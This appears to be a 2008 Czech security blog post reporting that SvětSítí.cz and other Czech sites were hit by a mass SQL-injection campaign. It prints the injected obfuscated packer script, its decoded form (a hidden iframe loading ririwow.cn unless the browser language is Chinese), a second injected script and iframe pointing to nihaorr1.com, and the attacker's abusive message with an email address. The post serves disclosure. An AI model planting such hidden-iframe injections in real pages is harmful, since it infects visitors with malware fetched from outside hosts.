Pravidelný občasník originálního humoru

www.kisswow.com.cn/m.js aneb SvětSítí.cz vám může hacknout počítač

Autor chlívek (Bezpečnost) - vydáno 11.5.2008

Další v článku jmenovaný virus/malware najdete i na dalších českých stránkách - je mezi nimi i pár známých jmen - Strabag, Alza či SPŠ Zlín


Útočné skripty umístěné na www.kisswow.com.cn dorazily už i na české weby. Nejde o žádnou novinku, pokud budete přímo tuto URI hledat v Google, najdete 1780 stránek, které jsou nakažené.  A mezi nakaženými jsou (pochopitelně) i české stránky - a to už tak dlouho, že to o nich ví i Google.

SvetSiti.cz může hacknout váš počítač

Původní kód :

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('8 (b.e==\'i-2\'){}4{3.g("<9 d=7:\/\/h.c.2\/a.6 f=1 5=0><\/9>");}',62,19,'|100|cn|document|else|height|htm|http|if|iframe|index
|navigator|ririwow|src|systemLanguage|width|writeln|www|zh'.split('|'),0,{}))

ze kterého se stane pouze: IFRAME, které stáhne docela zajímavý kód z ririwow.cn/index.htm (zábavný i koncem)

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe src=http://www.ririwow.cn/index.htm width=100 height=0></iframe>");}

This is a mass invasion.        Safeguard the motherland's dignity!
FUCK FRANCE!  FUCK CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO
kiss117276@163.com

Svět sítí sice mezitím původní kód odstranil, ale zjevné neodstranění možnosti to znovu napadnout se postaralo o další kód :

<<script src=http://www.nihaorr1.com/1.js></script>

který prozměnu používá přímo IFRAME (a taky patří mezi opravdu úspěšné s 306 000 výskyty):

document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nihaorr1.com\/1.htm\'><\/iframe>");

Původní ririwow.cn je známé i McAfee SiteAdvisor službě. A F-Secure eviduje tuto adresu jako součást mass sql-injection aktivity, kde mimochodem najdete i zmíněné nihaorr1.com.

Posledně jmenovaný najdete i na dalších českých stránkách - je mezi nimi i pár známých jmen - Strabag, Alza či SPŠ Zlín (screenshot).

 

Štítky : Hack, Malware, SQL Injection, Bezpečnost, Exploit



|
Poslední změna : 13.5.2008 15:26, Vytvořen : 11.5.2008 09:12, Vydán : 11.5.2008, 12423x

Komentáře pro ty z Facebooku

Aktuální články autora

Související články